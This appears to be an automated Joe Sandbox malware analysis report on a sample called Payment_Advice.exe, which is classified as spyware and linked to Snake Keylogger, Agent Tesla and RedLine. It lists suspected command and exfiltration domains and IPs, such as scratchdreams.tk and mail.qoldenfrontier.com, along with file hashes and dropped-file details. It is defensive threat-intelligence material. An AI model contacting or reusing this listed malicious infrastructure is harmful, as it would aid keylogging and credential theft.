  Source: hadvices.scr, 00000019.00000002.2455454438.00000000032CA000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032AF000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000031F3000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003202000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003245000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032BC000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032F8000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003294000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032A2000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032E9000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false
  Antivirus Detection: URL Reputation: safe
  Reputation: unknown

Name: https://github.com/Pester/Pester
  Source: powershell.exe, 00000004.00000002.1386246749.000001B480232000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false
  Reputation: high

Name: http://go.mic
  Source: Payment_Advice.exe, 00000000.00000002.1196271509.000000000124D000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Antivirus Detection: URL Reputation: safe; URL Reputation: safe
  Reputation: unknown

Name: https://advising-receipts.com
  Source: powershell.exe, 00000004.00000002.1386246749.000001B480C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1386246749.000001B481761000.00000004.00000800.00020000.00000000.sdmp
  Malicious: true
  Antivirus Detection: 10%, Virustotal, Browse; Avira URL Cloud: safe
  Reputation: unknown

Name: http://mail.qoldenfrontier.com
  Source: hadvices.scr, 00000019.00000002.2455454438.000000000345C000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003448000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.000000000343E000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003430000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003452000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003419000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false
  Antivirus Detection: 0%, Virustotal, Browse; Avira URL Cloud: malware
  Reputation: unknown

Name: https://www.adobe.co
  Source: ReaderMessages.6.dr
  Malicious: false
  Antivirus Detection: URL Reputation: safe
  Reputation: unknown

Name: https://g.live.com/odclientsettings/Prod1C:
  Source: edb.log.8.dr
  Malicious: false
  Reputation: high

Name: https://reallyfreegeoip.org/xml/149.18.24.96$
  Source: hadvices.scr, 00000019.00000002.2455454438.00000000032AF000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003245000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032BC000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032F8000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003294000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032A2000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032E9000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false
  Antivirus Detection: Avira URL Cloud: safe
  Reputation: unknown

Name: http://checkip.dyndns.org/q
  Source: hadvices.scr, 00000017.00000002.1415714567.0000000003E56000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2449808868.0000000000402000.00000040.00000400.00020000.00000000.sdmp
  Malicious: false
  Antivirus Detection: URL Reputation: safe
  Reputation: unknown

Name: https://contoso.com/
  Source: powershell.exe, 00000004.00000002.1456507128.000001B4901B3000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false
  Antivirus Detection: URL Reputation: safe
  Reputation: unknown

Name: https://nuget.org/nuget.exe
  Source: powershell.exe, 00000004.00000002.1456507128.000001B490070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1456507128.000001B4901B3000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false
  Reputation: high

Name: https://scratchdreams.tk
  Source: hadvices.scr, 00000017.00000002.1415714567.0000000003E56000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003131000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003306000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2449808868.0000000000402000.00000040.00000400.00020000.00000000.sdmp
  Malicious: false
  Antivirus Detection: 16%, Virustotal, Browse; Avira URL Cloud: malware
  Reputation: unknown

Name: http://reallyfreegeoip.org
  Source: hadvices.scr, 00000019.00000002.2455454438.00000000032AF000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032BC000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032F8000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.000000000321A000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003294000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032A2000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032E9000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false
  Antivirus Detection: URL Reputation: safe
  Reputation: unknown

Name: https://reallyfreegeoip.org
  Source: hadvices.scr, 00000019.00000002.2455454438.00000000032AF000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003202000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003245000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032BC000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032F8000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003294000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032A2000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032E9000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false
  Antivirus Detection: URL Reputation: safe
  Reputation: unknown

Name: https://aka.ms/pscore68
  Source: powershell.exe, 00000004.00000002.1386246749.000001B480001000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false
  Reputation: high

Name: http://checkip.dyndns.com
  Source: hadvices.scr, 00000019.00000002.2455454438.00000000032AF000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003202000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032BC000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032F8000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003294000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032A2000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032E9000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false
  Antivirus Detection: URL Reputation: safe
  Reputation: unknown

Name: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
  Source: powershell.exe, 00000004.00000002.1386246749.000001B480001000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003131000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false
  Reputation: high

Name: http://scratchdreams.tk
  Source: hadvices.scr, 00000019.00000002.2455454438.0000000003306000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false
  Antivirus Detection: 17%, Virustotal, Browse; Avira URL Cloud: malware
  Reputation: unknown

Name: https://reallyfreegeoip.org/xml/
  Source: hadvices.scr, 00000017.00000002.1415714567.0000000003E56000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003202000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2449808868.0000000000402000.00000040.00000400.00020000.00000000.sdmp
  Malicious: false
  Antivirus Detection: URL Reputation: safe
  Reputation: unknown
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
172.67.141.195 | advising-receipts.com | United States | 13335 | CLOUDFLARENETUS | true
23.56.12.145 | unknown | United States | 16625 | AKAMAI-ASUS | false
172.67.169.18 | scratchdreams.tk | United States | 13335 | CLOUDFLARENETUS | false
108.167.142.65 | mail.qoldenfrontier.com | United States | 46606 | UNIFIEDLAYER-AS-1US | true
193.122.130.0 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false
172.67.177.134 | reallyfreegeoip.org | United States | 13335 | CLOUDFLARENETUS | false

IP
127.0.0.1
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1434636
Start date and time: 2024-05-01 15:16:11 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 10s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 28
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Payment_Advice.exe
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winEXE@28/57@8/7
                            EGA Information:
                            • Successful, ratio: 80%
                            HCA Information:
                            • Successful, ratio: 99%
                            • Number of executed functions: 119
                            • Number of non-executed functions: 39
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
                            • Excluded IPs from analysis (whitelisted): 23.59.24.185, 162.159.61.3, 172.64.41.3, 34.193.227.236, 54.144.73.197, 107.22.247.231, 18.207.85.246, 23.209.58.93, 23.207.202.196, 23.207.202.183, 23.207.202.187, 184.25.58.168, 184.25.58.138, 23.207.202.186, 23.45.233.26, 23.45.233.19, 23.45.233.9, 23.12.145.72, 23.12.145.69
                            • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, slscr.update.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, time.windows.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, geo2.adobe.com, prod.fs.microsoft.com.akadns.net
                            • Execution Graph export aborted for target powershell.exe, PID 4912 because it is empty
                            • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes were analyzed, report is missing behavior information
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
15:17:05 | API Interceptor | 50x Sleep call for process: powershell.exe modified
15:17:11 | API Interceptor | 2x Sleep call for process: svchost.exe modified
15:17:26 | API Interceptor | 38461x Sleep call for process: hadvices.scr modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
23.56.12.145 | evervendor.exe | Get hash | malicious | NetSupport RAT | Browse | -
172.67.169.18 | DEKONT.exe | Get hash | malicious | PureLog Stealer, Snake Keylogger | Browse | -
172.67.169.18 | rSyDiExlek.exe | Get hash | malicious | Snake Keylogger | Browse | -
172.67.169.18 | 58208 Teklif.exe | Get hash | malicious | Snake Keylogger | Browse | -
172.67.169.18 | Purchase Order.exe | Get hash | malicious | Snake Keylogger | Browse | -
172.67.169.18 | 1d4D5ndo0x.exe | Get hash | malicious | PureLog Stealer, RedLine, Snake Keylogger | Browse | -
172.67.169.18 | D09876500900000H.exe | Get hash | malicious | PureLog Stealer, RedLine, Snake Keylogger | Browse | -
172.67.169.18 | z52OURO08765.exe | Get hash | malicious | PureLog Stealer, RedLine, Snake Keylogger | Browse | -
172.67.169.18 | SDTP098766700000.exe | Get hash | malicious | Snake Keylogger | Browse | -
172.67.169.18 | SecuriteInfo.com.Trojan.PackedNET.2725.8730.30889.exe | Get hash | malicious | Snake Keylogger | Browse | -
172.67.169.18 | vessel details.exe | Get hash | malicious | Snake Keylogger | Browse | -
108.167.142.65 | Remittance_copy.pdf.scr.exe | Get hash | malicious | Snake Keylogger | Browse | -
193.122.130.0 | SecuriteInfo.com.PUA.Tool.InstSrv.10.27384.30600.exe | Get hash | malicious | Unknown | Browse | checkip.dyndns.org/
193.122.130.0 | edlyEKgpaz.exe | Get hash | malicious | Snake Keylogger | Browse | checkip.dyndns.org/
193.122.130.0 | 58208 Teklif.exe | Get hash | malicious | Snake Keylogger | Browse | checkip.dyndns.org/
193.122.130.0 | Purchase Order.exe | Get hash | malicious | Snake Keylogger | Browse | checkip.dyndns.org/
193.122.130.0 | iCareFone.exe | Get hash | malicious | Agent Tesla, AgentTesla | Browse | checkip.dyndns.org/
193.122.130.0 | D09876500900000H.exe | Get hash | malicious | PureLog Stealer, RedLine, Snake Keylogger | Browse | checkip.dyndns.org/
193.122.130.0 | Quark Browser.exe | Get hash | malicious | Agent Tesla, AgentTesla | Browse | checkip.dyndns.org/
193.122.130.0 | Payment_Draft_confirmation.xla.xlsx | Get hash | malicious | Snake Keylogger | Browse | checkip.dyndns.org/
193.122.130.0 | e-dekont.exe | Get hash | malicious | Snake Keylogger | Browse | checkip.dyndns.org/
193.122.130.0 | #U83e0#U841d#U5305#U8f7b#U5c0f#U8bf4 5.0.36.exe | Get hash | malicious | Agent Tesla, AgentTesla | Browse | checkip.dyndns.org/
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
mail.qoldenfrontier.com | Remittance_copy.pdf.scr.exe | Get hash | malicious | Snake Keylogger | Browse | 108.167.142.65
checkip.dyndns.com | DEKONT.exe | Get hash | malicious | PureLog Stealer, Snake Keylogger | Browse | 132.226.8.169
checkip.dyndns.com | SecuriteInfo.com.PUA.Tool.InstSrv.10.27384.30600.exe | Get hash | malicious | Unknown | Browse | 193.122.130.0
checkip.dyndns.com | SecuriteInfo.com.PUA.Tool.InstSrv.10.27384.30600.exe | Get hash | malicious | Unknown | Browse | 193.122.6.168
checkip.dyndns.com | DEKONT.exe | Get hash | malicious | PureLog Stealer, Snake Keylogger | Browse | 193.122.6.168
checkip.dyndns.com | e-dekont.exe | Get hash | malicious | Snake Keylogger | Browse | 158.101.44.242
checkip.dyndns.com | ATTHACHED SCAN-P.O SPECIFICATIONS.009.24. 001.doc | Get hash | malicious | Snake Keylogger | Browse | 193.122.6.168
checkip.dyndns.com | order.exe | Get hash | malicious | Unknown | Browse | 158.101.44.242
checkip.dyndns.com | 0FvHGK2cyk.exe | Get hash | malicious | Agent Tesla, AgentTesla | Browse | 193.122.6.168
checkip.dyndns.com | M0uVrW4HJb.exe | Get hash | malicious | Agent Tesla, AgentTesla | Browse | 132.226.247.73
checkip.dyndns.com | rSyDiExlek.exe | Get hash | malicious | Snake Keylogger | Browse | 132.226.247.73
scratchdreams.tk | DEKONT.exe | Get hash | malicious | PureLog Stealer, Snake Keylogger | Browse | 172.67.169.18
scratchdreams.tk | DEKONT.exe | Get hash | malicious | PureLog Stealer, Snake Keylogger | Browse | 104.21.27.85
scratchdreams.tk | e-dekont.exe | Get hash | malicious | Snake Keylogger | Browse | 104.21.27.85
scratchdreams.tk | rSyDiExlek.exe | Get hash | malicious | Snake Keylogger | Browse | 172.67.169.18
scratchdreams.tk | PsBygexGwH.exe | Get hash | malicious | Snake Keylogger | Browse | 104.21.27.85
scratchdreams.tk | 58208 Teklif.exe | Get hash | malicious | Snake Keylogger | Browse | 172.67.169.18
scratchdreams.tk | Zarefy4bOs.exe | Get hash | malicious | Snake Keylogger | Browse | 104.21.27.85
scratchdreams.tk | Remittance_copy.pdf.scr.exe | Get hash | malicious | Snake Keylogger | Browse | 104.21.27.85
scratchdreams.tk | Purchase Order.exe | Get hash | malicious | Snake Keylogger | Browse | 104.21.27.85
scratchdreams.tk | Fuy2BDS9W2.exe | Get hash | malicious | PureLog Stealer, RedLine, Snake Keylogger | Browse | 104.21.27.85
reallyfreegeoip.org | DEKONT.exe | Get hash | malicious | PureLog Stealer, Snake Keylogger | Browse | 172.67.177.134
reallyfreegeoip.org | DEKONT.exe | Get hash | malicious | PureLog Stealer, Snake Keylogger | Browse | 104.21.67.152
reallyfreegeoip.org | e-dekont.exe | Get hash | malicious | Snake Keylogger | Browse | 104.21.67.152
reallyfreegeoip.org | rSyDiExlek.exe | Get hash | malicious | Snake Keylogger | Browse | 104.21.67.152
reallyfreegeoip.org | Pnihosiyvr.exe | Get hash | malicious | PureLog Stealer, Snake Keylogger | Browse | 172.67.177.134
reallyfreegeoip.org | BmLue8t2V7.exe | Get hash | malicious | Snake Keylogger | Browse | 172.67.177.134
reallyfreegeoip.org | gZIZ5eyCtS.exe | Get hash | malicious | Snake Keylogger | Browse | 172.67.177.134
reallyfreegeoip.org | edlyEKgpaz.exe | Get hash | malicious | Snake Keylogger | Browse | 104.21.67.152
                                                    edlyEKgpaz.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • 104.21.67.152
                                                    PsBygexGwH.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • 172.67.177.134
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                    No context

Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 1310720
Entropy (8bit): 0.7067125840780447
Encrypted: false
SSDEEP: 1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6Vq8:2JIB/wUKUKQncEmYRTwh0A
MD5: FBA1EBA67D48EFD6082412A4BC17A03F
SHA1: 1185C72E9E4C9943C88AFB941DA811AF18EBF96C
SHA-256: 6D3292221AC71FFDD57E4A861CF1D152D8F022DD39A455442A2573F9579A37AD
SHA-512: 04F4413C425C9EC1A152B8240DF32F34A3AEA9BFC8D64D3C534BE43DEA52CF509CF9072A311C41A0DF8E14946C8CE79C36E95B69F5B7B0DD201959471909DCA7
Malicious: false
Reputation: low

Process: C:\Windows\System32\svchost.exe
File Type: Extensible storage engine DataBase, version 0x620, checksum 0xd9fe882d, page size 16384, DirtyShutdown, Windows version 10.0
Category: dropped
Size (bytes): 1310720
Entropy (8bit): 0.7899680894856709
Encrypted: false
SSDEEP: 1536:bSB2ESB2SSjlK/JvED2y0IEWBqbMo5g5FYkr3g16k42UPkLk+kq+UJ8xUJoU+dzV:bazaPvgurTd42UgSii
MD5: 79BEF46783EF92BF264A68DF9419FD57
SHA1: 962A4F9713BBFEF0E8D5DB28260857C7F304BE72
SHA-256: 2E026480D67E5715E7C71FC77F35B9D84B4F2C6BFAE4DBC11344325887B33103
SHA-512: E08DBDD9A33E479E3B99636E93D6E1EF968118B4CD426FC628E801B14439D1AE95A5B1C33AF8742E9044C2ADE4E75AACEF36BC3BE60287980D1C653B5AD5181E
Malicious: false
Reputation: low

Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 16384
Entropy (8bit): 0.08220881982324885
Encrypted: false
SSDEEP: 3:9Dl/EYeeRpIkqNt/57Dek3JuYgIvollEqW3l/TjzzQ/t:3Ez8pIkqPR3tdgIQmd8/
MD5: AD5AC5435094ACB44C002C278CF1AA80
SHA1: 3987FEABF118C51DA0658D17E6988CA9E33679DD
SHA-256: C14E7058B09BD2AD36AC4F707D8D224072AC68E04AF937E98599784A7572F69D
SHA-512: 5D0B02E704C218597D917D0AB667F97F9FFEF19E4274A7DAB2436317776F39A673AEC36B8CDF2F3BC3376169680F4C64D881C060BA6FD4BE91A258CD7163F34B
Malicious: false
Reputation: low

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: PDF document, version 1.4, 1 pages
Category: dropped
Size (bytes): 502695
Entropy (8bit): 7.210153211803877
Encrypted: false
SSDEEP: 6144:64zLGoksGfh1BpNxE/Tb4CvJLGOwSc/12r3Or/WBo8YFISKYPaA9nFw2N3eNCW1:6SiscDS/PvJSSW2rIF8YwYt9nFw2RLW1
MD5: 7FB38EC672E93118DE75747E60232837
SHA1: 32313AB4489CBC195637C8E3B62BDD799A54D1B7
SHA-256: 80E8B1A5F0008B00EE033242975E238B68127CBDE39ABB97CE7EC6147138AB94
SHA-512: 3E969865C47A16BF75B14D5C423CFA2D6BDB2F278F320EEAE3160C28C8D8A454F8AD97B936F4F08681A104321316A94EFA1D089F20F0AF22E1D591E474A1BBD8
Malicious: true
Reputation: low

Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type: ASCII text
Category: dropped
Size (bytes): 297
Entropy (8bit): 5.254765038789286
Encrypted: false
SSDEEP: 6:DtVqM+q2PcNwi2nKuAl9OmbnIFUt86tkSZZmw+6t9MVkwOcNwi2nKuAl9OmbjLJ:DTqM+vLZHAahFUt866m/+63MV54ZHAae
MD5: 844D98E17F7347B5DF4EC5571829510F
SHA1: C735F791546F3F8F43B6D0DD4CEEC32D7643BB36
SHA-256: F9453BD15A83A8BF54B6D15F0BF43A220EFA216430200B7E07E52E4EF5D232A7
SHA-512: C5E28F61DA34BED704D9AF73D8CCBFF2F92F306EA0DBF479136FD5BCBD5F557654444D977203465CDCD44E987D564E2360B0AA33895B294109C03790C903B8C6
Malicious: false
Reputation: low
Preview: 2024/05/01-15:17:08.909 b6c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/05/01-15:17:08.910 b6c Recovering log #3.2024/05/01-15:17:08.911 b6c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type: ASCII text
Category: dropped
Size (bytes): 344
Entropy (8bit): 5.158101134701621
Encrypted: false
SSDEEP: 6:DtQ+L+q2PcNwi2nKuAl9Ombzo2jMGIFUt86t1h/KWZmw+6t1hsLVkwOcNwi2nKuA:DG+L+vLZHAa8uFUt86fcW/+6f+LV54Zg
MD5: B734EB51166A26337004AA60EE0C9657
SHA1: 7A9AA2DEB8480B5FE51B5C9D9C234EF1A7B0466A
SHA-256: A9A32002BB03484253722834046DEE5C7746A8694EA2A44AFBFC6002906D2E47
SHA-512: 70A93E26662E755C0C092979DC2D09A069D8F5B5E28D4CCA2EB2CE1EE2540F687573152AA6C1E46B2550734A4A88B6A171B8A1422A98CF0F5BB7088560D99ECD
Malicious: false
Preview: 2024/05/01-15:17:09.350 1ccc Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/05/01-15:17:10.255 1ccc Recovering log #3.2024/05/01-15:17:10.256 1ccc Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type: JSON data
Category: dropped
Size (bytes): 475
Entropy (8bit): 4.969814904260269
Encrypted: false
SSDEEP: 12:YH/um3RA8sqPsBdOg2HSOgcaq3QYiubSpDyP7E4T3y:Y2sRdsRdMHSOL3QYhbSpDa7nby
MD5: 7BE9C8316EB1B7252CB363207744A145
SHA1: 57861355BE6541501AED40F896891579DCF473BF
SHA-256: B8F7FC35C094B26B18BB46BB695F1D520904FF063398D86C5B06FD3E20F1881D
SHA-512: 2C7A056CDC3EF05D5E62822CC0BD835FA80CD06131CB76BF559B1D06F735A279C7DCEDE51F1E3A418596573CC960BAFAA038A45966E8007F671F7B6BFFD885DB
Malicious: false
Preview: {"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341052428587673","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146366},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.7","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:JSON data
                                                    Category:modified
                                                    Size (bytes):475
                                                    Entropy (8bit):4.97540442432775
                                                    Encrypted:false
                                                    SSDEEP:12:YH/um3RA8sqZcOssBdOg2HYcaq3QYiubSpDyP7E4T3y:Y2sRdsIRdMHT3QYhbSpDa7nby
                                                    MD5:8FEF4BD905474B359901BBFF50B979E7
                                                    SHA1:F90EC0D6540D443BC03E0B224FF18DC3AD109650
                                                    SHA-256:3F9536248316B24A9E30635A64A17FEB668BBAE213D061538B04145A5B738CF6
                                                    SHA-512:64246E0C8BA7CA108D11EDEC6A6BF2B4B75DF60B55CF75B9BAC1AD3467FB6464271FDB1CE2CD941CB587F156A883200245D43DBD28BE67C59EEAC46109DE9E8A
                                                    Malicious:false
                                                    Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13359129440655962","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":152570},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.7","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):4099
                                                    Entropy (8bit):5.234188823330911
                                                    Encrypted:false
                                                    SSDEEP:96:CwNwpDGHqPySfkcr2smSX8I2OQCDh28wDtPaDzDKzj:CwNw1GHqPySfkcigoO3h28ytPa3Dwj
                                                    MD5:E2A8F7BE535B5C26E6F9478DA8FEF509
                                                    SHA1:72E6255AC96E4AD10C5CF2007426E11C9D40615A
                                                    SHA-256:B1722E74805375F4BFAB81AA66FF226A6B44EE79D5BEF2A4956AE9A72921F106
                                                    SHA-512:E975EED158E43816E95EDEFE59B9AF9CCD9C4B17C634B609424032675BE7DDB09461BCE1214B586E1E916B3DE65C32496213FA7B35899FBB193F40D234F16CF0
                                                    Malicious:false
                                                    Preview:*...#................version.1..namespace-.aw.o................next-map-id.1.Pnamespace-aa11265e_f35e_4e5d_85db_f163e1c0f691-https://rna-resource.acrobat.com/.0I.$.r................next-map-id.2.Snamespace-9a9aa6d6_c307_4dda_b6c0_dc91084c8e68-https://rna-v2-resource.acrobat.com/.1!...r................next-map-id.3.Snamespace-1fbd9dc5_70a3_4975_91b4_966e0915c27a-https://rna-v2-resource.acrobat.com/.2..N.o................next-map-id.4.Pnamespace-0e0aed8d_6d6f_4be0_b28f_8e02158bc792-https://rna-resource.acrobat.com/.3*.z.o................next-map-id.5.Pnamespace-52652c26_09c2_43f2_adf7_da56a1f00d32-https://rna-resource.acrobat.com/.4.{.^...............Pnamespace-aa11265e_f35e_4e5d_85db_f163e1c0f691-https://rna-resource.acrobat.com/.C..r................next-map-id.6.Snamespace-3a89c6b0_72b9_411a_9e44_fa247f34ac91-https://rna-v2-resource.acrobat.com/.5.q._r................next-map-id.7.Snamespace-02b23955_9103_42e0_ba64_3f8683969652-https://rna-v2-resource.acrobat.com/.6..d.o..............
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):332
                                                    Entropy (8bit):5.137154002699195
                                                    Encrypted:false
                                                    SSDEEP:6:Dt1UpGpL+q2PcNwi2nKuAl9OmbzNMxIFUt86t1U1/KWZmw+6t1UEhLVkwOcNwi2v:DfUpGpL+vLZHAa8jFUt86fU1CW/+6fUt
                                                    MD5:4CF6E63CAA83049C07404C395D86B8F3
                                                    SHA1:8BB1BA6AD468BC0CB41DCAAFDDF4E2E65BF16723
                                                    SHA-256:B58675F211F6F17B1CB98963B34BA2F7EBFD4480AD0237ABFC1E6BACDA63CB6F
                                                    SHA-512:BA759D1F408C05E771485011DB57F81CF6E4B0EC7ABFABEC643FEFB4DF304BEF98AA82C88D4C0BFDD4D1EDAF045605A914EDF690148773D0903666B7047967C9
                                                    Malicious:false
